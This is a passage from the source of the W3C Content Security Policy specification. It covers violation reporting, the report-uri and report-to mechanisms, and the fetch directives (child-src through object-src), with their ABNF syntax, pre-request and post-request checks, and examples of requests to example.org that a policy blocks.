          `Document`</a>, set |target| to null.

          Note: This ensures that we fire events only at elements <a>connected</a>
          to |violation|'s <a for="violation">policy</a>'s {{Document}}. If a
          violation is caused by an element which isn't connected to that
          document, we'll fire the event at the document rather than the element
          in order to ensure that the violation is visible to the document's
          listeners.

      2.  If |target| is null:

          1.  Set |target| to |violation|'s <a for="violation">global object</a>.

          2.  If |target| is a {{Window}}, set |target| to |target|'s <a>associated
              `Document`</a>.

      3.  If |target| [=implements=] {{EventTarget}}, <a>fire an event</a> named
          <dfn event for="GlobalEventHandlers,WorkerGlobalScope">securitypolicyviolation</dfn> that uses the {{SecurityPolicyViolationEvent}}
          interface at |target| with its attributes initialized as follows:

          :  {{SecurityPolicyViolationEvent/documentURI}}
          ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
              <a for="violation">url</a>.
          :  {{SecurityPolicyViolationEvent/referrer}}
          ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
              <a for="violation">referrer</a>.
          :  {{SecurityPolicyViolationEvent/blockedURI}}
          ::  The result of executing [[#obtain-violation-blocked-uri]] on |violation|'s
              <a for="violation">resource</a>.
          :  {{SecurityPolicyViolationEvent/effectiveDirective}}
          :: |violation|'s <a for="violation">effective directive</a>
          :  {{SecurityPolicyViolationEvent/violatedDirective}}
          :: |violation|'s <a for="violation">effective directive</a>
          :  {{SecurityPolicyViolationEvent/originalPolicy}}
          ::  The <a lt="serialized CSP">serialization</a> of |violation|'s
              <a for="violation">policy</a>
          :  {{SecurityPolicyViolationEvent/disposition}}
          :: |violation|'s <a for="violation">disposition</a>
          :  {{SecurityPolicyViolationEvent/sourceFile}}
          ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
              <a for="violation">source file</a>, if |violation|'s
              <a for="violation">source file</a> is not null, or null otherwise.
          :  {{SecurityPolicyViolationEvent/statusCode}}
          :: |violation|'s <a for="violation">status</a>
          :  {{SecurityPolicyViolationEvent/lineNumber}}
          :: |violation|'s <a for="violation">line number</a>
          :  {{SecurityPolicyViolationEvent/columnNumber}}
          :: |violation|'s <a for="violation">column number</a>
          :  {{SecurityPolicyViolationEvent/sample}}
          :: |violation|'s <a for="violation">sample</a>
          :  {{Event/bubbles}}
          :: `true`
          :  {{Event/composed}}
          :: `true`

          Note: We set the {{Event/composed}} attribute, which means that this event
          can be captured on its way into, and will bubble its way out of a shadow
          tree. {{Event/target}}, et al will be automagically scoped correctly for
          the main tree.

          Note: Both {{SecurityPolicyViolationEvent/effectiveDirective}} and
          {{SecurityPolicyViolationEvent/violatedDirective}} are the same value.
          This is intentional to maintain backwards compatibility.

      4.  If |violation|'s <a for="violation">policy</a>'s <a for="policy">directive
          set</a> contains a <a>directive</a> named "<a>`report-uri`</a>"
          |directive|:

          1.  If |violation|'s <a for="violation">policy</a>'s
              <a for="policy">directive set</a> contains a <a>directive</a> named
              "<a>`report-to`</a>", skip the remaining substeps.

          2.  <a for=set>For each</a> |token| of |directive|'s
              <a for="directive">value</a>:

              1.  Let |endpoint| be the result of executing the <a>URL parser</a>
                  with |token| as the input, and |violation|'s
                  <a for="violation">url</a> as the <a>base URL</a>.

              2.  If |endpoint| is not a valid URL, skip the remaining substeps.

              3.  Let |request| be a new <a for="/">request</a>, initialized as follows:

                  :   <a for="request">method</a>
                  ::  "`POST`"
                  :   <a for="request">url</a>
                  ::  |violation|'s <a for="violation">url</a>
                  :   <a for="request">origin</a>
                  ::  |violation|'s <a for="violation">global object</a>'s <a>relevant settings
                      object</a>'s <a for="environment settings object">origin</a>
                  :   <a for="request">window</a>
                  ::  "`no-window`"
                  :   <a for="request">client</a>
                  ::  |violation|'s <a for="violation">global object</a>'s <a>relevant
                      settings object</a>
                  :   <a for="request">destination</a>
                  ::  "`report`"
                  :   <a for="request">initiator</a>
                  ::  ""
                  :   <a for="request">credentials mode</a>
                  ::  "`same-origin`"
                  :   <a for="request">keepalive</a>
                  ::  "`true`"
                  :   <a for="request">header list</a>
                  ::  A header list containing a single header whose name is
                      "`Content-Type`", and value is "`application/csp-report`"
                  :   <a for="request">body</a>
                  ::  The result of executing [[#deprecated-serialize-violation]] on
                      |violation|
                  :   <a for="request">redirect mode</a>
                  ::  "`error`"

                  Note: |request|'s <a for="request">mode</a> defaults to "`no-cors`"; the response is ignored entirely.

              4.  <a for="/">Fetch</a> |request|. The result will be ignored.

          Note: All of this should be considered deprecated. It sends a single
          request per violation, which simply isn't scalable. As soon as this
          behavior can be removed from user agents, it will be.

          Note: `report-uri` only takes effect if `report-to` is not present. That
          is, the latter overrides the former, allowing for backwards compatibility
          with browsers that don't support the new mechanism.

      5.  If |violation|'s <a for="violation">policy</a>'s <a for="policy">directive
          set</a> contains a <a>directive</a> named "<a>`report-to`</a>"
          |directive|:

          1.  Let |body| be a new {{CSPViolationReportBody}}, initialized as
              follows:

              :   {{CSPViolationReportBody/documentURL}}
              ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
                  <a for="violation">url</a>.

              :   {{CSPViolationReportBody/referrer}}
              ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
                  <a for="violation">referrer</a>.

              :   {{CSPViolationReportBody/blockedURL}}
              ::  The result of executing [[#obtain-violation-blocked-uri]] on |violation|'s
                  <a for="violation">resource</a>.

              :   {{CSPViolationReportBody/effectiveDirective}}
              ::  |violation|'s <a for="violation">effective directive</a>.

              :   {{CSPViolationReportBody/originalPolicy}}
              ::  The <a lt="serialized CSP">serialization</a> of |violation|'s
                  <a for="violation">policy</a>.

              :   {{CSPViolationReportBody/sourceFile}}
              ::  The result of executing [[#strip-url-for-use-in-reports]] on |violation|'s
                  <a for="violation">source file</a>, if |violation|'s
                  <a for="violation">source file</a> is not null, or null otherwise.

              :   {{CSPViolationReportBody/sample}}
              ::  |violation|'s <a for="violation">sample</a>.

              :   {{CSPViolationReportBody/disposition}}
              ::  |violation|'s <a for="violation">disposition</a>.

              :   {{CSPViolationReportBody/statusCode}}
              ::  |violation|'s <a for="violation">status</a>.

              :   {{CSPViolationReportBody/lineNumber}}
              ::  |violation|'s <a for="violation">line number</a>, if
                  |violation|'s <a for="violation">source file</a> is not null,
                  or null otherwise.

              :   {{CSPViolationReportBody/columnNumber}}
              ::  |violation|'s <a for="violation">column number</a>, if
                  |violation|'s <a for="violation">source file</a> is not null,
                  or null otherwise.

          2.  Let |settings object| be |violation|'s <a for="violation">global
              object</a>'s <a>relevant settings object</a>.

          3.  [=Generate and queue a report=] with the following arguments:

              :   <var ignore>context</var>
              ::  |settings object|
              :   <var ignore>type</var>
              ::  "csp-violation"
              :   <var ignore>destination</var>
              ::  |directive|'s <a for="directive">value</a>.
              :   <var ignore>data</var>
              ::  |body|
</section>

<!-- Big Text: Directives -->
<section>
  <h2 id="csp-directives">
    Content Security Policy Directives
  </h2>

  This specification defines a number of types of <a>directives</a> which allow
  developers to control certain aspects of their sites' behavior. This document
  defines directives which govern resource fetching (in [[#directives-fetch]]),
  directives which govern the state of a document (in [[#directives-document]]),
  directives which govern aspects of navigation (in [[#directives-navigation]]),
  and directives which govern reporting (in [[#directives-reporting]]). These
  form the core of Content Security Policy; other directives are defined in a
  modular fashion in ancillary documents (see [[#directives-elsewhere]] for
  examples).

  To mitigate the risk of cross-site scripting attacks, web developers SHOULD
  include directives that regulate sources of script and plugins. They can do
  so by including:

  *   Both the <a>script-src</a> and <a>object-src</a> directives, or
  *   a <a>default-src</a> directive

  In either case, developers SHOULD NOT include either
  <a grammar>`'unsafe-inline'`</a>, or `data:` as valid
  sources in their policies. Both enable XSS attacks by allowing code to be
  included directly in the document itself; they are best avoided completely.

  <h3 id="directives-fetch">
    Fetch Directives
  </h3>

  <dfn export>Fetch directives</dfn> control the locations from which certain resource
  types may be loaded. For instance, <a>script-src</a> allows developers to allow
  trusted sources of script to execute on a page, while <a>font-src</a> controls the
  sources of web fonts.

  <h4 id="directive-child-src">`child-src`</h4>

  The <dfn export>`child-src`</dfn> directive governs the creation of <a>child
  navigables</a> (e.g. <{iframe}> and <{frame}> navigations) and Worker execution
  contexts. The syntax for the directive's name and value is described by the
  following ABNF:

  <pre>
    directive-name  = "child-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  This directive controls <a for="/">requests</a> which will populate a frame or a
  worker. More formally, <a for="/">requests</a> falling into one of the
  following categories:

  *  <a for="request">destination</a> is "`frame`", "`iframe`", "`object`", or "`embed`".

  *  <a for="request">destination</a> is either "`serviceworker`",
     "`sharedworker`", or "`worker`" (which are fed to the <a>run a worker</a>
     algorithm for {{ServiceWorker}}, {{SharedWorker}}, and {{Worker}},
     respectively).

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>child-src</a> https://example.com/
    </pre>

    Fetches for the following code will all return network errors, as the URLs
    provided do not match `child-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;iframe src="https://example.org"&gt;&lt;/iframe&gt;
      &lt;script&gt;
        var blockedWorker = new Worker("data:application/javascript,...");
      &lt;/script&gt;
    </pre>
  </div>

  <h5 algorithm id="child-src-pre-request">
    `child-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing
      [[#effective-directive-for-a-request]] on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `child-src` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing the <a for="directive">pre-request
      check</a> for the <a>directive</a> whose <a for="directive">name</a>
      is |name| on |request| and |policy|, using this directive's
      <a for="directive">value</a> for the comparison.

  <h5 algorithm id="child-src-post-request">
    `child-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing
      [[#effective-directive-for-a-request]] on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `child-src` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing the <a for="directive">post-request
      check</a> for the <a>directive</a> whose <a for="directive">name</a>
      is |name| on |request|, |response|, and |policy|, using this directive's
      <a for="directive">value</a> for the comparison.

  <h4 id="directive-connect-src">`connect-src`</h4>

  The <dfn export>connect-src</dfn> directive restricts the URLs which can be loaded
  using script interfaces. The syntax for the directive's name and value is
  described by the following ABNF:

  <pre>
    directive-name  = "connect-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  This directive controls <a for="/">requests</a> which transmit or receive data from
  other origins. This includes APIs like `fetch()`, [[XHR]], [[EVENTSOURCE]],
  [[BEACON]], and <{a}>'s <{a/ping}>. This directive <em>also</em> controls
  WebSocket [[WEBSOCKETS]] connections, though those aren't technically part
  of Fetch.

  <div class="example">
    JavaScript offers a few mechanisms that directly connect to an external
    server to send or receive information. `EventSource` maintains an open
    HTTP connection to a server in order to receive push notifications,
    `WebSockets` open a bidirectional communication channel between your
    browser and a server, and `XMLHttpRequest` makes arbitrary HTTP requests
    on your behalf. These are powerful APIs that enable useful functionality,
    but also provide tempting avenues for data exfiltration.

    The `connect-src` directive allows you to ensure that these and similar
    sorts of connections are only opened to origins you trust. Sending a
    policy that defines a list of source expressions for this directive is
    straightforward. For example, to limit connections to only
    `https://example.com`, send the following header:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>connect-src</a> https://example.com/
    </pre>

    Fetches for the following code will all return network errors, as the URLs
    provided do not match `connect-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;a ping="https://example.org"&gt;...
      &lt;script&gt;
        var xhr = new XMLHttpRequest();
        xhr.open('GET', 'https://example.org/');
        xhr.send();

        var ws = new WebSocket("wss://example.org/");

        var es = new EventSource("https://example.org/");

        navigator.sendBeacon("https://example.org/", { ... });
      &lt;/script&gt;
    </pre>
  </div>


  <h5 algorithm id="connect-src-pre-request">
    `connect-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing
      [[#effective-directive-for-a-request]] on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `connect-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and
      |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="connect-src-post-request">
    `connect-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing
      [[#effective-directive-for-a-request]] on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `connect-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-default-src">`default-src`</h4>

  The <dfn export>default-src</dfn> directive serves as a fallback for the other
  <a>fetch directives</a>. The syntax for the directive's name and value is described by
  the following ABNF:

  <pre>
    directive-name  = "default-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  If a <a>default-src</a> directive is present in a policy, its value will be
  used as the policy's default source list. That is, given `default-src 'none';
  script-src 'self'`, script requests will use `'self'` as the <a>source
  list</a> to match against. Other requests will use `'none'`. This is spelled
  out in more detail in the [[#should-block-request]] and
  [[#should-block-response]] algorithms.

  <div class="note">
  Resource hints such as <{link/rel/prefetch}> and <{link/rel/preconnect}> generate requests that
  aren't tied to any specific [=fetch directive=], but are instead governed by the union of servers
  allowed in all of a policy's directives' [=source lists=]. If <a>default-src</a> is not specified, these
  requests will always be allowed. For more information, see [[#exfiltration]]. [[!HTML]]
  </div>


  <div class="example">
    The following header:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>default-src</a> <a grammar>'self'</a>
    </pre>

    will have the same behavior as the following header:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>connect-src</a> <a grammar>'self'</a>;
                               <a>font-src</a> <a grammar>'self'</a>;
                               <a>frame-src</a> <a grammar>'self'</a>;
                               <a>img-src</a> <a grammar>'self'</a>;
                               <a>manifest-src</a> <a grammar>'self'</a>;
                               <a>media-src</a> <a grammar>'self'</a>;
                               <a>object-src</a> <a grammar>'self'</a>;
                               <a>script-src-elem</a> <a grammar>'self'</a>;
                               <a>script-src-attr</a> <a grammar>'self'</a>;
                               <a>style-src-elem</a> <a grammar>'self'</a>;
                               <a>style-src-attr</a> <a grammar>'self'</a>;
                               <a>worker-src</a> <a grammar>'self'</a>
    </pre>

    That is, when `default-src` is set, every <a>fetch directive</a> that isn't
    explicitly set will fall back to the value `default-src` specifies.
  </div>
  <div class="example">
    There is no inheritance. If a `script-src` directive is explicitly
    specified, for example, then the value of `default-src` has no influence on
    script requests. That is, the following header:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>default-src</a> <a grammar>'self'</a>; <a>script-src-elem</a> https://example.com
    </pre>

    will have the same behavior as the following header:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>connect-src</a> <a grammar>'self'</a>;
                               <a>font-src</a> <a grammar>'self'</a>;
                               <a>frame-src</a> <a grammar>'self'</a>;
                               <a>img-src</a> <a grammar>'self'</a>;
                               <a>manifest-src</a> <a grammar>'self'</a>;
                               <a>media-src</a> <a grammar>'self'</a>;
                               <a>object-src</a> <a grammar>'self'</a>;
                               <a>script-src-elem</a> https://example.com;
                               <a>script-src-attr</a> <a grammar>'self'</a>;
                               <a>style-src-elem</a> <a grammar>'self'</a>;
                               <a>style-src-attr</a> <a grammar>'self'</a>;
                               <a>worker-src</a> <a grammar>'self'</a>
    </pre>

    Given this behavior, one good way to build a policy for a site would be to
    begin with a `default-src` of `'none'`, and to build up a policy from there
    which allowed only those resource types which are necessary for the
    particular page the policy will apply to.
  </div>

  <h5 algorithm id="default-src-pre-request">
    `default-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing
      [[#effective-directive-for-a-request]] on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `default-src` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing the
      <a for="directive">pre-request check</a> for the <a>directive</a> whose
      <a for="directive">name</a> is |name| on |request| and |policy|, using
      this directive's <a for="directive">value</a> for the comparison.

  <h5 algorithm id="default-src-post-request">
    `default-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing
      [[#effective-directive-for-a-request]] on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `default-src` and |policy| is "`No`", return "`Allowed`".

  3.  Return the result of executing the
      <a for="directive">post-request check</a> for the <a>directive</a> whose
      <a for="directive">name</a> is |name| on |request|, |response|, and
      |policy|, using this directive's <a for="directive">value</a> for the
      comparison.

  <h5 algorithm id="default-src-inline">
    `default-src` Inline Check
  </h5>

  This directive's <a for="directive">inline check</a> algorithm is as follows:

  Given an {{Element}} |element|, a string |type|, a <a for="/">policy</a>
  |policy| and a string |source|:

  1.  Let |name| be the result of executing [[#effective-directive-for-inline-check]]
      on |type|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `default-src` and |policy| is "`No`", return "`Allowed`".

  3.  Otherwise, return the result of executing the
      <a for="directive">inline check</a> for the <a>directive</a> whose
      <a for="directive">name</a> is |name| on |element|, |type|, |policy|
      and |source|, using this directive's <a for="directive">value</a> for the
      comparison.

  <h4 id="directive-font-src">`font-src`</h4>

  The <dfn export>font-src</dfn> directive restricts the URLs from which font resources
  may be loaded. The syntax for the directive's name and value is described by
  the following ABNF:

  <pre>
    directive-name  = "font-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>
  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>font-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `font-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;style&gt;
        @font-face {
          font-family: "Example Font";
          src: url("https://example.org/font");
        }
        body {
          font-family: "Example Font";
        }
      &lt;/style&gt;
    </pre>
  </div>

  <h5 algorithm id="font-src-pre-request">
    `font-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `font-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and
      |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="font-src-post-request">
    `font-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `font-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-frame-src">`frame-src`</h4>

  The <dfn export>frame-src</dfn> directive restricts the URLs which may be loaded into
  <a>child navigables</a>. The syntax for the directive's name and value
  is described by the following ABNF:

  <pre>
    directive-name  = "frame-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>frame-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `frame-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;iframe src="https://example.org/"&gt;
      &lt;/iframe&gt;
    </pre>
  </div>

  <h5 algorithm id="frame-src-pre-request">
    `frame-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `frame-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and
      |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="frame-src-post-request">
    `frame-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `frame-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-img-src">`img-src`</h4>

  The <dfn export>img-src</dfn> directive restricts the URLs from which image resources
  may be loaded. The syntax for the directive's name and value is described by
  the following ABNF:

  <pre>
    directive-name  = "img-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  This directive controls <a for="/">requests</a> which load images. More formally, this
  includes <a for="/">requests</a> whose <a for="request">destination</a> is "`image`"
  [[FETCH]].

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>img-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `img-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;img src="https://example.org/img"&gt;
    </pre>
  </div>

  <h5 algorithm id="img-src-pre-request">
    `img-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `img-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="img-src-post-request">
    `img-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `img-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-manifest-src">`manifest-src`</h4>

  The <dfn export>manifest-src</dfn> directive restricts the URLs from which application
  manifests may be loaded [[APPMANIFEST]]. The syntax for the directive's name
  and value is described by the following ABNF:

  <pre>
    directive-name  = "manifest-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>manifest-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `manifest-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;link rel="manifest" href="https://example.org/manifest"&gt;
    </pre>
  </div>

  <h5 algorithm id="manifest-src-pre-request">
    `manifest-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `manifest-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="manifest-src-post-request">
    `manifest-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `manifest-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h4 id="directive-media-src">`media-src`</h4>

  The <dfn export>media-src</dfn> directive restricts the URLs from which video, audio,
  and associated text track resources may be loaded. The syntax for the
  directive's name and value is described by the following ABNF:

  <pre>
    directive-name  = "media-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>media-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `media-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;audio src="https://example.org/audio"&gt;&lt;/audio&gt;
      &lt;video src="https://example.org/video"&gt;
          &lt;track kind="subtitles" src="https://example.org/subtitles"&gt;
      &lt;/video&gt;
    </pre>
  </div>

  <h5 algorithm id="media-src-pre-request">
    `media-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `media-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="media-src-post-request">
    `media-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `media-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-response-to-source-list]] on
      |response|, |request|, this directive's <a for="directive">value</a>,
      and |policy|, is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

<h4 id="directive-object-src">`object-src`</h4>

  The <dfn export>object-src</dfn> directive restricts the URLs from which plugin
  content may be loaded. The syntax for the directive's name and value is
  described by the following ABNF:

  <pre>
    directive-name  = "object-src"
    directive-value = <a grammar>serialized-source-list</a>
  </pre>

  <div class="example">
    Given a page with the following Content Security Policy:

    <pre>
      <a http-header>Content-Security-Policy</a>: <a>object-src</a> https://example.com/
    </pre>

    Fetches for the following code will return a network errors, as the URL
    provided do not match `object-src`'s <a>source list</a>:

    <pre highlight="html">
      &lt;embed src="https://example.org/flash"&gt;&lt;/embed&gt;
      &lt;object data="https://example.org/flash"&gt;&lt;/object&gt;
    </pre>
  </div>

  If plugin content is loaded without an associated URL (perhaps an <{object}>
  element lacks a <{object/data}> attribute, but loads some default plugin based
  on the specified `type`), it MUST be blocked if `object-src`'s value is
  `'none'`, but will otherwise be allowed.

  Note: The `object-src` directive acts upon any request made on behalf of
  an <{object}> or <{embed}> element. This includes requests
  which would populate the <a>child navigable</a> generated by the
  former two (also including navigations). This is true even when the data is
  semantically equivalent to content which would otherwise be restricted by
  another directive, such as an <{object}> element with a `text/html` MIME
  type.

  Note: When a plugin resource is navigated to directly (that is, as a <a spec=html>plugin</a>
  inside a <a>navigable</a>, and not as an embedded
  subresource via <{embed}> or <{object}>), any <a for="/">policy</a> delivered along
  with that resource will be applied to the resulting {{Document}}. This means, for instance, that
  developers can prevent the execution of arbitrary resources as plugin content by delivering the
  policy `object-src 'none'` along with a response. Given plugins' power (and the
  sometimes-interesting security model presented by Flash and others), this could mitigate the risk
  of attack vectors like
  <a href="https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/">Rosetta Flash</a>.

  <h5 algorithm id="object-src-pre-request">
    `object-src` Pre-request check
  </h5>

  This directive's <a for="directive">pre-request check</a> is as follows:

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|:

  1.  Let |name| be the result of executing [[#effective-directive-for-a-request]]
      on |request|.

  2.  If the result of executing [[#should-directive-execute]] on |name|,
      `object-src` and |policy| is "`No`", return "`Allowed`".

  3.  If the result of executing [[#match-request-to-source-list]] on
      |request|, this directive's <a for="directive">value</a>, and |policy|,
      is "`Does Not Match`", return "`Blocked`".

  4.  Return "`Allowed`".

  <h5 algorithm id="object-src-post-request">
    `object-src` Post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|, and a
  <a for="/">policy</a> |policy|:

